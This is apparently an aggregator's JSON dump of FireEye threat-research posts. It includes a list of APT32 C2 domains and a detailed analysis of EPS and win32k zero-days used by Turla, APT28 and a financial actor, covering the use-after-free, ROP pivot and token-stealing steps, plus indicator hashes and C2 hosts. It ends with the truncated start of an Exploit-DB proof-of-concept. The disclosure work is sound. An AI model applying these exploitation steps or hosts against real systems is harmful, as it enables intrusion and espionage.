\n\nssl.zin0.com\n\n| \n\nstatic.jg7.org \n \nsyn.timeizu.net\n\n| \n\nteriava.com\n\n| \n\ntimeizu.net \n \ntonholding.com\n\n| \n\ntulationeva.com\n\n| \n\nuntitled.po9z.com \n \nupdate-flashs.com\n\n| \n\nvieweva.com\n\n| \n\nvolveri.net \n \nvphelp.net\n\n| \n\nyii.yiihao126.net\n\n| \n\nzone.apize.net \n \nTable 4: Sampling of APT32 C2 Infrastructure\n", "modified": "2017-05-14T18:00:00", "published": "2017-05-14T18:00:00", "id": "FIREEYE:3E714A2B7BA85E8C1459F38BE1BC289A", "href": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "type": "fireeye", "title": "Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-06T23:14:39", "bulletinFamily": "info", "cvelist": ["CVE-2017-0001", "CVE-2017-0263", "CVE-2017-0199", "CVE-2016-7255", "CVE-2017-0262", "CVE-2017-0261"], "description": "In 2015, FireEye published details about two attacks exploiting vulnerabilities in Encapsulated PostScript (EPS) of Microsoft Office. One was a [zero-day](<https://www.fireeye.com/blog/threat-research/2015/09/attack_exploitingmi.html>) and one was [patched](<https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html>) weeks before the attack launched.\n\nRecently, FireEye identified three new zero-day vulnerabilities in Microsoft Office products that are being exploited in the wild.\n\nAt the end of March 2017, we detected another malicious document leveraging an unknown vulnerability in EPS and a recently [patched](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0001>) vulnerability in Windows Graphics Device Interface (GDI) to drop malware. Following the April 2017 Patch Tuesday, in which Microsoft disabled EPS, FireEye detected a second unknown vulnerability in EPS.\n\nFireEye believes that two actors \u2013 [Turla](<https://www.fireeye.com/content/dam/fireeye-www/company/events/infosec/threat-landscape-overview-fireeye-summit-paris.pdf>) and an unknown financially motivated actor \u2013 were using the first EPS zero-day ([CVE-2017-0261](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0261>)), and [APT28](<https://www.fireeye.com/blog/threat-research/2014/10/apt28-a-window-into-russias-cyber-espionage-operations.html>) was using the second EPS zero-day ([CVE-2017-0262](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0262>)) along with a new Escalation of Privilege (EOP) zero-day ([CVE-2017-0263](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0263>)). Turla and APT28 are Russian cyber espionage groups that have used these zero-days against European diplomatic and military entities. The unidentified financial group targeted regional and global banks with offices in the Middle East. The following is a description of the EPS zero-days, associated malware, and the new EOP zero-day. Each EPS zero-day is accompanied by an EOP exploit, with the EOP being required to escape the sandbox that executes the FLTLDR.EXE instance used for EPS processing.\n\nThe malicious documents have been used to deliver three different payloads. CVE-2017-0261 was used to deliver SHIRIME (Turla) and NETWIRE (unknown financially motivated actor), and CVE-2017-0262 was used to deliver GAMEFISH (APT28). CVE-2017-0263 is used to escalate privileges during the delivery of the GAMEFISH payload.\n\nFireEye [email](<https://www.fireeye.com/products/ex-email-security-products.html>) and [network](<https://www.fireeye.com/products/nx-network-security-products.html>) products detected the malicious documents.\n\nFireEye has been coordinating with the Microsoft Security Response Center (MSRC) for the responsible disclosure of this information. Microsoft advises all customers to follow the guidance in [security advisory ADV170005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV170005>) as a defense-in-depth measure against EPS filter vulnerabilities.\n\n#### CVE-2017-0261 \u2013 EPS _\"restore\"_ Use-After-Free\n\nUpon opening the Office document, the FLTLDR.EXE is utilized to render an embedded EPS image, which contains the exploit. The EPS file is a PostScript program, which leverages a Use-After-Free vulnerability in \u201c_restore_\u201d operand.\n\nFrom the [PostScript Manual](<https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf>): \u201cAllocations in local VM and modifications to existing objects in local VM are subject to a feature called **save** and **restore**, named after the operators that invoke it. **save** and **restore** bracket a section of a PostScript language program whose local VM activity is to be encapsulated. **restore** deallocates new objects and undoes modifications to existing objects that were made since the matching **save**.\u201d\n\nAs the manual described, the _restore_ operator will reclaim memory allocated since the _save_ operator. This makes a perfect condition of Use-After-Free, when combined with _forall_ operator. Figure 1 shows the pseudo code to exploit the save and restore operation.\n\nFigure 1: Pseudo code for the exploit\n\nThe following operations allow the Pseudo code to leak metadata enabling a read/write primitive:\n\n 1. forall_proc array is created with a single element of the restore proc\n 2. The EPS state is **_saved_** to eps_state\n 3. uaf_array is created after the save\n 4. The forall operator loops over the elements of the uaf_array calling forall_proc for each element\n 5. The first element of uaf_array is passed to a call of restore_proc, the procedure contained in forall_proc\n 6. restore_proc\n * **_restores_** the initial state freeing the uaf_array\n * The alloc_string procedure reclaims the freed uaf_array\n * The forall_proc is updated to call leak_proc\n 7. Subsequent calls by the forall operator call the leak_proc on each element of the reclaimed uaf_array which elements now contain the result of the alloc_string procedure\n\nFigure 2 demonstrates a debug log of the uaf_array being used after being reclaimed.\n\nFigure 2: uaf_array reclaimed debug log\n\nBy manipulating the operations after the _save_ operator, the attacker is able to manipulate the memory layouts and convert the Use-After-Free to create a read/write primitive. Figure 3 shows the faked string, with length set as 0x7fffffff, base as 0.\n\nFigure 3: Faked String Object\n\nLeveraging the power of reading and writing arbitrary user memory, the EPS program continues by searching for gadgets to build the ROP chain, and creates a **_file_** object. Figure 4 demonstrates the faked file object in memory.\n\nFigure 4: Fake File Object, with ROP\n\nBy calling **_closefile_** operand with the faked file object, the exploit pivots to the ROP and starts the shellcode. Figure 5 shows part of the disassembler of **_closefile_** operand handler.\n\nFigure 5: Stack Pivot disassembler of closefile\n\nOnce execution has been achieved, the malware uses the ROP chain to change the execution protection of the memory region containing the shellcode. At this point, the shellcode is running within a sandbox that was executing FLTLDR.EXE and an escalation of privilege is required to escape that sandbox.\n\nFireEye detected two different versions of the EPS program exploiting this vulnerability. The first, st07383.en17.docx, continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME. SHIRIME is one of multiple custom JavaScript implants used by Turla as a first stage payload to conduct initial profiling of a target system and implement command and control. Since early 2016, we have observed multiple iterations of SHIRIME used in the wild, having the most recent version (v1.0.1004) employed in this zero-day\n\nThe second document, Confirmation_letter.docx, continues by utilizing 32 or 64 bit versions of CVE-2016-7255 to escalate privilege before dropping a new variant of the NETWIRE malware family. Several versions of this document were seen with similar filenames.\n\nThe EPS programs contained within these documents contained different logic to perform the construction of the ROP chain as well as build the shellcode. The first took the additional step of using a simple algorithm, shown in Figure 6, to obfuscate sections of the shellcode.\n\nFigure 6: Shellcode obfuscation algorithm\n\n#### CVE-2017-0262 \u2013 Type Confusion in EPS\n\nThe second EPS vulnerability is a type confused procedure object of forall operator that can alter the execution flow allowing an attacker to control values onto the operand stack. This vulnerability was found in a document named \u201cTrump's_Attack_on_Syria_English.docx\u201d.\n\nBefore triggering the vulnerability, the EPS program sprays the memory with predefined data to occupy specific memory address and facilitate the exploitation. Figure 7 demonstrates the PostScript code snippet of spraying memory with a string.\n\nFigure 7: PostScript code snippet of spray\n\nAfter execution, the content of string occupies the memory at address 0x0d80d000, leading to the memory layout as shown in Figure 8. The exploit leverages this layout and the content to forge a procedure object and manipulate the code flow to store predefined value, in yellow, to the operator stack.\n\nFigure 8: Memory layout of the sprayed data\n\nAfter spraying the heap, the exploit goes on to call a code statement in the following format: _1 array 16#D80D020 forall_. It creates an Array object, sets the procedure as the hex number 0xD80D020, and calls the _forall_ operator. During the operation of the forged procedure within _forall_ operator, it precisely controls the execution flow to store values of the attacker's choices to operand stack. Figure 9 shows the major code flow consuming the forged procedure.\n\nFigure 9: Consuming the forged procedure\n\nAfter execution of _forall_, the contents on the stack are under the attacker's control. This is s shown in Figure 10.\n\nFigure 10: Stack after the forall execution\n\nSince the operand stack has been manipulated, the subsequent operations of _exch_ defines objects based on the data from the manipulated stack, as shown in Figure 11.\n\nFigure 11: Subsequent code to retrieve data from stack\n\nThe A18 is a string type object, which has a length field of 0x7ffffff0, based from 0. Within memory, the layout as shown in Figure 12.\n\nFigure 12: A18 String Object\n\nThe A19 is an array type object, with member values all purposely crafted. The exploit defines another array object and puts it into the forged array A19. By performing these operations, it puts the newly created array object pointer into A19. The exploit can then directly read the value from the predictable address, 0xD80D020 + 0x38, and leak its vftable and infer module base address of EPSIMP32.flt. Figure 13 shows code snippets of leaking EPSIMP32 base address.\n\nFigure 13: Code snippet of leaking module base\n\nFigure 14 shows the operand stack of calling _put_ operator and the forged Array A19 after finishing the _put_ operation.\n\nFigure 14: Array A19 after the put operation\n\nBy leveraging the RW primitive string and the leaked module base of EPSIMP32, the exploit continues by searching ROP gadgets, creating a fake file object, and pivoting to shellcode through the _bytesavailable_ operator. Figure 15 shows the forged file type object and disassembling of pivoting to ROP and shellcode.\n\nFigure 15: Pivots to ROP and Shellcode\n\nThe shellcode continues by using a previously unknown EOP, CVE-2017-0263, to escalate privileges to escape the sandbox running FLTLDR.EXE, and then drop and execute a GAMEFISH payload. Only a 32-bit version of CVE-2017-0263 is contained in the shellcode.\n\n#### CVE-2017-0263 \u2013 win32k!xxxDestroyWindow Use-After-Free\n\nThe EOP Exploit setup starts by suspending all threads other than the current thread and saving the thread handles to a table, as shown in Figure 16.\n\n\n\nFigure 16: Suspending Threads\n\nThe exploit then checks for OS version and uses that information to populate version specific fields such as token offset, syscall number, etc. An executable memory area is allocated and populated with kernel mode shellcode as wells as address information required by the shellcode. A new thread is created for triggering the vulnerability and further control of exploitation.\n\nThe exploit starts by creating three PopupMenus and appending menus to them, as shown in Figure 17. The exploit creates 0x100 windows with random classnames. The User32!HMValidateHandle trick is used to leak the tagWnd address, which is used as kernel information leak throughout the exploit.\n\nFigure 17: Popup menu creation\n\nRegisterClassExW is then used to register a window class \u201cMain_Window_Class\u201d with a WndProc pointing to a function, which calls DestroyWindow on window table created by EventHookProc, explained later in the blog. This function also shows the first popup menu, which was created earlier.\n\nTwo extra windows are created with class name as \u201cMain_Window_Class\u201d. SetWindowLong is used to change WndProc of second window, wnd2, to a shellcode address. An application defined hook, WindowHookProc, and an event hook, EventHookProc, are installed by SetWindowsHookExW and SetWinEventHook respectively. PostMessage is used to post 0xABCD to first window, wnd1.\n\nThe EventHookProc waits for EVENT_SYSTEM_MENUPOPUPSTART and saves the window\u2019s handle to a table. WindowHookProc looks for **SysShadow **classname and sets a new WndProc for the corresponding window. Inside this WndProc, NtUserMNDragLeave syscall is invoked and SendMessage is used to send 0x9f9f to wnd2, invoking the shellcode shown in Figure 18.\n\n\n\nFigure 18: Triggering the shellcode\n\nThe Use-After-Free happens inside WM_NCDESTROY event in kernel and overwrites wnd2\u2019s tagWnd structure, which sets bServerSideWindowProc flag. With bServerSideWindowProc set, the user mode WndProc is considered as a kernel callback and will be invoked from kernel context \u2013 in this case wnd2\u2019s WndProc is the shellcode.\n\nThe shellcode checks whether the memory corruption has occurred by checking if the code segment is not the user mode code segment. It also checks whether the message sent is 0x9f9f. Once the validation is completed, shellcode finds the TOKEN address of current process and TOKEN of system process (pid 4). The shellcode then copies the system process\u2019 token to current process, which elevates current process privilege to SYSTEM.\n\n#### Conclusion\n\n_EPS processing has become a ripe exploitation space for attackers._\n\nFireEye has discovered and analyzed two of these recent EPS zero-days with examples seen before and after Microsoft disabled EPS processing in the April 2017 Patch Tuesday. The documents explored utilize differing EPS exploits, ROP construction, shellcode, EOP exploits and final payloads. While these documents are detected by FireEye appliances, users should exercise caution because FLTLDR.EXE is not monitored by EMET.\n\n_Russian cyber espionage is a well-resourced, dynamic threat_\n\nThe use of zero-day exploits by Turla Group and APT28 underscores their capacity to apply technically sophisticated and costly methods when necessary. Russian cyber espionage actors use zero-day exploits in addition to less complex measures. Though these actors have relied on credential phishing and macros to carry out operations previously, the use of these methods does not reflect a lack of resources. Rather, the use of less technically sophisticated methods \u2013 when sufficient \u2013 reflects operational maturity and the foresight to protect costly exploits until they are necessary.\n\n_A vibrant ecosystem of threats_\n\nCVE-2017-0261\u2019s use by multiple actors is further evidence that cyber espionage and criminal activity exist in a shared ecosystem. Nation state actors, such as those leveraging [CVE-2017-0199 to distribute FINSPY](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html>), often rely on the same sources for exploits as criminal actors. This shared ecosystem creates a proliferation problem for defenders concerned with either type of threat.\n\nCVE-2017-0261 was being used as a zero-day by both nation state and cyber crime actors, and we believe that both actors obtained the vulnerability from a common source. Following [CVE-2017-0199](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>), this is the second major vulnerability in as many months that has been used for both espionage and crime.\n\n**MD5**\n\n| \n\n**Filename**\n\n| \n\n**C2 Host** \n \n---|---|--- \n \n2abe3cc4bff46455a945d56c27e9fb45\n\n| \n\nConfirmation_letter.docx.bin\n\n(NETWIRE)\n\n| \n\n84.200.2.12 \n \ne091425d23b8db6082b40d25e938f871\n\n| \n\nConfirmation_letter.docx\n\n(NETWIRE)\n\n| \n\n138.201.44.30 \n \n006bdb19b6936329bffd4054e270dc6a\n\n| \n\nConfirmation_letter_ACM.docx\n\n(NETWIRE)\n\n| \n\n185.106.122.113 \n \n15660631e31c1172ba5a299a90938c02\n\n| \n\nst07383.en17.docx\n\n(SHIRIME)\n\n| \n\ntnsc.webredirect.org \n \nf8e92d8b5488ea76c40601c8f1a08790\n\n| \n\nTrump's_Attack_on_Syria_English.docx\n\n(GAMEFISH)\n\n| \n\nwmdmediacodecs.com \n \nTable 1: Source Exploit Documents\n\nTable 2: CVEs related to these attacks\n\n#### Acknowledgements\n\niSIGHT Intelligence Team, FLARE Team, FireEye Labs, Microsoft Security Response Center (MSRC).\n", "modified": "2017-05-09T13:00:00", "published": "2017-05-09T13:00:00", "id": "FIREEYE:AA5B50E5C593F4E6EFF300E3DE9EDB85", "href": "https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html", "type": "fireeye", "title": "EPS Processing Zero-Days Exploited by Multiple Threat Actors ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:18:21", "bulletinFamily": "info", "cvelist": ["CVE-2017-0001", "CVE-2017-0263", "CVE-2017-0199", "CVE-2016-7255", "CVE-2017-0262", "CVE-2017-0261"], "description": "In 2015, FireEye published details about two attacks exploiting vulnerabilities in Encapsulated PostScript (EPS) of Microsoft Office. One was a [zero-day](<https://www.fireeye.com/blog/threat-research/2015/09/attack_exploitingmi.html>) and one was [patched](<https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html>) weeks before the attack launched.\n\nRecently, FireEye identified three new zero-day vulnerabilities in Microsoft Office products that are being exploited in the wild.\n\nAt the end of March 2017, we detected another malicious document leveraging an unknown vulnerability in EPS and a recently [patched](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0001>) vulnerability in Windows Graphics Device Interface (GDI) to drop malware. Following the April 2017 Patch Tuesday, in which Microsoft disabled EPS, FireEye detected a second unknown vulnerability in EPS.\n\nFireEye believes that two actors \u2013 [Turla](<https://www.fireeye.com/content/dam/fireeye-www/company/events/infosec/threat-landscape-overview-fireeye-summit-paris.pdf>) and an unknown financially motivated actor \u2013 were using the first EPS zero-day ([CVE-2017-0261](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0261>)), and [APT28](<https://www.fireeye.com/blog/threat-research/2014/10/apt28-a-window-into-russias-cyber-espionage-operations.html>) was using the second EPS zero-day ([CVE-2017-0262](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0262>)) along with a new Escalation of Privilege (EOP) zero-day ([CVE-2017-0263](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0263>)). Turla and APT28 are Russian cyber espionage groups that have used these zero-days against European diplomatic and military entities. The unidentified financial group targeted regional and global banks with offices in the Middle East. The following is a description of the EPS zero-days, associated malware, and the new EOP zero-day. Each EPS zero-day is accompanied by an EOP exploit, with the EOP being required to escape the sandbox that executes the FLTLDR.EXE instance used for EPS processing.\n\nThe malicious documents have been used to deliver three different payloads. CVE-2017-0261 was used to deliver SHIRIME (Turla) and NETWIRE (unknown financially motivated actor), and CVE-2017-0262 was used to deliver GAMEFISH (APT28). CVE-2017-0263 is used to escalate privileges during the delivery of the GAMEFISH payload.\n\nFireEye [email](<https://www.fireeye.com/products/ex-email-security-products.html>) and [network](<https://www.fireeye.com/products/nx-network-security-products.html>) products detected the malicious documents.\n\nFireEye has been coordinating with the Microsoft Security Response Center (MSRC) for the responsible disclosure of this information. Microsoft advises all customers to follow the guidance in [security advisory ADV170005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV170005>) as a defense-in-depth measure against EPS filter vulnerabilities.\n\n#### CVE-2017-0261 \u2013 EPS _\"restore\"_ Use-After-Free\n\nUpon opening the Office document, the FLTLDR.EXE is utilized to render an embedded EPS image, which contains the exploit. The EPS file is a PostScript program, which leverages a Use-After-Free vulnerability in \u201c_restore_\u201d operand.\n\nFrom the [PostScript Manual](<https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf>): \u201cAllocations in local VM and modifications to existing objects in local VM are subject to a feature called **save** and **restore**, named after the operators that invoke it. **save** and **restore** bracket a section of a PostScript language program whose local VM activity is to be encapsulated. **restore** deallocates new objects and undoes modifications to existing objects that were made since the matching **save**.\u201d\n\nAs the manual described, the _restore_ operator will reclaim memory allocated since the _save_ operator. This makes a perfect condition of Use-After-Free, when combined with _forall_ operator. Figure 1 shows the pseudo code to exploit the save and restore operation.\n\nFigure 1: Pseudo code for the exploit\n\nThe following operations allow the Pseudo code to leak metadata enabling a read/write primitive:\n\n 1. forall_proc array is created with a single element of the restore proc\n 2. The EPS state is **_saved_** to eps_state\n 3. uaf_array is created after the save\n 4. The forall operator loops over the elements of the uaf_array calling forall_proc for each element\n 5. The first element of uaf_array is passed to a call of restore_proc, the procedure contained in forall_proc\n 6. restore_proc\n * **_restores_** the initial state freeing the uaf_array\n * The alloc_string procedure reclaims the freed uaf_array\n * The forall_proc is updated to call leak_proc\n 7. Subsequent calls by the forall operator call the leak_proc on each element of the reclaimed uaf_array which elements now contain the result of the alloc_string procedure\n\nFigure 2 demonstrates a debug log of the uaf_array being used after being reclaimed.\n\nFigure 2: uaf_array reclaimed debug log\n\nBy manipulating the operations after the _save_ operator, the attacker is able to manipulate the memory layouts and convert the Use-After-Free to create a read/write primitive. Figure 3 shows the faked string, with length set as 0x7fffffff, base as 0.\n\nFigure 3: Faked String Object\n\nLeveraging the power of reading and writing arbitrary user memory, the EPS program continues by searching for gadgets to build the ROP chain, and creates a **_file_** object. Figure 4 demonstrates the faked file object in memory.\n\nFigure 4: Fake File Object, with ROP\n\nBy calling **_closefile_** operand with the faked file object, the exploit pivots to the ROP and starts the shellcode. Figure 5 shows part of the disassembler of **_closefile_** operand handler.\n\nFigure 5: Stack Pivot disassembler of closefile\n\nOnce execution has been achieved, the malware uses the ROP chain to change the execution protection of the memory region containing the shellcode. At this point, the shellcode is running within a sandbox that was executing FLTLDR.EXE and an escalation of privilege is required to escape that sandbox.\n\nFireEye detected two different versions of the EPS program exploiting this vulnerability. The first, st07383.en17.docx, continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME. SHIRIME is one of multiple custom JavaScript implants used by Turla as a first stage payload to conduct initial profiling of a target system and implement command and control. Since early 2016, we have observed multiple iterations of SHIRIME used in the wild, having the most recent version (v1.0.1004) employed in this zero-day\n\nThe second document, Confirmation_letter.docx, continues by utilizing 32 or 64 bit versions of CVE-2016-7255 to escalate privilege before dropping a new variant of the NETWIRE malware family. Several versions of this document were seen with similar filenames.\n\nThe EPS programs contained within these documents contained different logic to perform the construction of the ROP chain as well as build the shellcode. The first took the additional step of using a simple algorithm, shown in Figure 6, to obfuscate sections of the shellcode.\n\nFigure 6: Shellcode obfuscation algorithm\n\n#### CVE-2017-0262 \u2013 Type Confusion in EPS\n\nThe second EPS vulnerability is a type confused procedure object of forall operator that can alter the execution flow allowing an attacker to control values onto the operand stack. This vulnerability was found in a document named \u201cTrump's_Attack_on_Syria_English.docx\u201d.\n\nBefore triggering the vulnerability, the EPS program sprays the memory with predefined data to occupy specific memory address and facilitate the exploitation. Figure 7 demonstrates the PostScript code snippet of spraying memory with a string.\n\nFigure 7: PostScript code snippet of spray\n\nAfter execution, the content of string occupies the memory at address 0x0d80d000, leading to the memory layout as shown in Figure 8. The exploit leverages this layout and the content to forge a procedure object and manipulate the code flow to store predefined value, in yellow, to the operator stack.\n\nFigure 8: Memory layout of the sprayed data\n\nAfter spraying the heap, the exploit goes on to call a code statement in the following format: _1 array 16#D80D020 forall_. It creates an Array object, sets the procedure as the hex number 0xD80D020, and calls the _forall_ operator. During the operation of the forged procedure within _forall_ operator, it precisely controls the execution flow to store values of the attacker's choices to operand stack. Figure 9 shows the major code flow consuming the forged procedure.\n\nFigure 9: Consuming the forged procedure\n\nAfter execution of _forall_, the contents on the stack are under the attacker's control. This is s shown in Figure 10.\n\nFigure 10: Stack after the forall execution\n\nSince the operand stack has been manipulated, the subsequent operations of _exch_ defines objects based on the data from the manipulated stack, as shown in Figure 11.\n\nFigure 11: Subsequent code to retrieve data from stack\n\nThe A18 is a string type object, which has a length field of 0x7ffffff0, based from 0. Within memory, the layout as shown in Figure 12.\n\nFigure 12: A18 String Object\n\nThe A19 is an array type object, with member values all purposely crafted. The exploit defines another array object and puts it into the forged array A19. By performing these operations, it puts the newly created array object pointer into A19. The exploit can then directly read the value from the predictable address, 0xD80D020 + 0x38, and leak its vftable and infer module base address of EPSIMP32.flt. Figure 13 shows code snippets of leaking EPSIMP32 base address.\n\nFigure 13: Code snippet of leaking module base\n\nFigure 14 shows the operand stack of calling _put_ operator and the forged Array A19 after finishing the _put_ operation.\n\nFigure 14: Array A19 after the put operation\n\nBy leveraging the RW primitive string and the leaked module base of EPSIMP32, the exploit continues by searching ROP gadgets, creating a fake file object, and pivoting to shellcode through the _bytesavailable_ operator. Figure 15 shows the forged file type object and disassembling of pivoting to ROP and shellcode.\n\nFigure 15: Pivots to ROP and Shellcode\n\nThe shellcode continues by using a previously unknown EOP, CVE-2017-0263, to escalate privileges to escape the sandbox running FLTLDR.EXE, and then drop and execute a GAMEFISH payload. Only a 32-bit version of CVE-2017-0263 is contained in the shellcode.\n\n#### CVE-2017-0263 \u2013 win32k!xxxDestroyWindow Use-After-Free\n\nThe EOP Exploit setup starts by suspending all threads other than the current thread and saving the thread handles to a table, as shown in Figure 16.\n\n\n\nFigure 16: Suspending Threads\n\nThe exploit then checks for OS version and uses that information to populate version specific fields such as token offset, syscall number, etc. An executable memory area is allocated and populated with kernel mode shellcode as wells as address information required by the shellcode. A new thread is created for triggering the vulnerability and further control of exploitation.\n\nThe exploit starts by creating three PopupMenus and appending menus to them, as shown in Figure 17. The exploit creates 0x100 windows with random classnames. The User32!HMValidateHandle trick is used to leak the tagWnd address, which is used as kernel information leak throughout the exploit.\n\nFigure 17: Popup menu creation\n\nRegisterClassExW is then used to register a window class \u201cMain_Window_Class\u201d with a WndProc pointing to a function, which calls DestroyWindow on window table created by EventHookProc, explained later in the blog. This function also shows the first popup menu, which was created earlier.\n\nTwo extra windows are created with class name as \u201cMain_Window_Class\u201d. SetWindowLong is used to change WndProc of second window, wnd2, to a shellcode address. An application defined hook, WindowHookProc, and an event hook, EventHookProc, are installed by SetWindowsHookExW and SetWinEventHook respectively. PostMessage is used to post 0xABCD to first window, wnd1.\n\nThe EventHookProc waits for EVENT_SYSTEM_MENUPOPUPSTART and saves the window\u2019s handle to a table. WindowHookProc looks for **SysShadow **classname and sets a new WndProc for the corresponding window. Inside this WndProc, NtUserMNDragLeave syscall is invoked and SendMessage is used to send 0x9f9f to wnd2, invoking the shellcode shown in Figure 18.\n\n\n\nFigure 18: Triggering the shellcode\n\nThe Use-After-Free happens inside WM_NCDESTROY event in kernel and overwrites wnd2\u2019s tagWnd structure, which sets bServerSideWindowProc flag. With bServerSideWindowProc set, the user mode WndProc is considered as a kernel callback and will be invoked from kernel context \u2013 in this case wnd2\u2019s WndProc is the shellcode.\n\nThe shellcode checks whether the memory corruption has occurred by checking if the code segment is not the user mode code segment. It also checks whether the message sent is 0x9f9f. Once the validation is completed, shellcode finds the TOKEN address of current process and TOKEN of system process (pid 4). The shellcode then copies the system process\u2019 token to current process, which elevates current process privilege to SYSTEM.\n\n#### Conclusion\n\n_EPS processing has become a ripe exploitation space for attackers._\n\nFireEye has discovered and analyzed two of these recent EPS zero-days with examples seen before and after Microsoft disabled EPS processing in the April 2017 Patch Tuesday. The documents explored utilize differing EPS exploits, ROP construction, shellcode, EOP exploits and final payloads. While these documents are detected by FireEye appliances, users should exercise caution because FLTLDR.EXE is not monitored by EMET.\n\n_Russian cyber espionage is a well-resourced, dynamic threat_\n\nThe use of zero-day exploits by Turla Group and APT28 underscores their capacity to apply technically sophisticated and costly methods when necessary. Russian cyber espionage actors use zero-day exploits in addition to less complex measures. Though these actors have relied on credential phishing and macros to carry out operations previously, the use of these methods does not reflect a lack of resources. Rather, the use of less technically sophisticated methods \u2013 when sufficient \u2013 reflects operational maturity and the foresight to protect costly exploits until they are necessary.\n\n_A vibrant ecosystem of threats_\n\nCVE-2017-0261\u2019s use by multiple actors is further evidence that cyber espionage and criminal activity exist in a shared ecosystem. Nation state actors, such as those leveraging [CVE-2017-0199 to distribute FINSPY](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html>), often rely on the same sources for exploits as criminal actors. This shared ecosystem creates a proliferation problem for defenders concerned with either type of threat.\n\nCVE-2017-0261 was being used as a zero-day by both nation state and cyber crime actors, and we believe that both actors obtained the vulnerability from a common source. Following [CVE-2017-0199](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>), this is the second major vulnerability in as many months that has been used for both espionage and crime.\n\n**MD5**\n\n| \n\n**Filename**\n\n| \n\n**C2 Host** \n \n---|---|--- \n \n2abe3cc4bff46455a945d56c27e9fb45\n\n| \n\nConfirmation_letter.docx.bin\n\n(NETWIRE)\n\n| \n\n84.200.2.12 \n \ne091425d23b8db6082b40d25e938f871\n\n| \n\nConfirmation_letter.docx\n\n(NETWIRE)\n\n| \n\n138.201.44.30 \n \n006bdb19b6936329bffd4054e270dc6a\n\n| \n\nConfirmation_letter_ACM.docx\n\n(NETWIRE)\n\n| \n\n185.106.122.113 \n \n15660631e31c1172ba5a299a90938c02\n\n| \n\nst07383.en17.docx\n\n(SHIRIME)\n\n| \n\ntnsc.webredirect.org \n \nf8e92d8b5488ea76c40601c8f1a08790\n\n| \n\nTrump's_Attack_on_Syria_English.docx\n\n(GAMEFISH)\n\n| \n\nwmdmediacodecs.com \n \nTable 1: Source Exploit Documents\n\nTable 2: CVEs related to these attacks\n\n#### Acknowledgements\n\niSIGHT Intelligence Team, FLARE Team, FireEye Labs, Microsoft Security Response Center (MSRC).\n", "modified": "2017-05-09T13:00:00", "published": "2017-05-09T13:00:00", "id": "FIREEYE:35D0439B3D476357F4D2F51F3D5CD294", "href": "https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html", "type": "fireeye", "title": "EPS Processing Zero-Days Exploited by Multiple Threat Actors ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-11-10T01:30:30", "description": "Microsoft Windows Kernel - win32k Denial of Service (MS16-135). CVE-2016-7255. Dos exploit for Windows platform", "published": "2016-11-09T00:00:00", "type": "exploitdb", "title": "Microsoft Windows Kernel - win32k Denial of Service (MS16-135)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7255"], "modified": "2016-11-09T00:00:00", "id": "EDB-ID:40745", "href": "https://www.exploit-db.com/exploits/40745/", "sourceData": "/*\r\nSource: https://github.com/tinysec/public/tree/master/CVE-2016-7255\r\n\r\nFull Proof of Concept:\r\n\r\nhttps://github.com/tinysec/public/tree/master/CVE-2016-7255\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40745.zip\r\n\r\n********************************************************************\r\n Created:\t2016-11-09 14:23:09\r\n Filename: \tmain.c\r\n Author:\troot[at]TinySec.net\r\n Version\t0.0.0.1\r\n Purpose:\tpoc of cve-2016-0075\r\n*********************************************************************\r\n*/\r\n\r\n#include <windows.h>\r\n#include <wchar.h>\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n\r\n\r\n//////////////////////////////////////////////////////////////////////////\r\n#pragma comment(lib,\"ntdll.lib\")\r\n#pragma comment(lib,\"user32.lib\")\r\n\r\n#undef DbgPrint\r\nULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... );\r\nULONG __cdecl DbgPrint(__in char* Format, ...)\r\n{\r\n\tCHAR* pszDbgBuff = NULL;\r\n\tva_list VaList=NULL;\r\n\tULONG ulRet = 0;\r\n\t\r\n\tdo \r\n\t{\r\n\t\tpszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR));\r\n\t\tif (NULL == pszDbgBuff)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tRtlZeroMemory(pszDbgBuff,1024 * 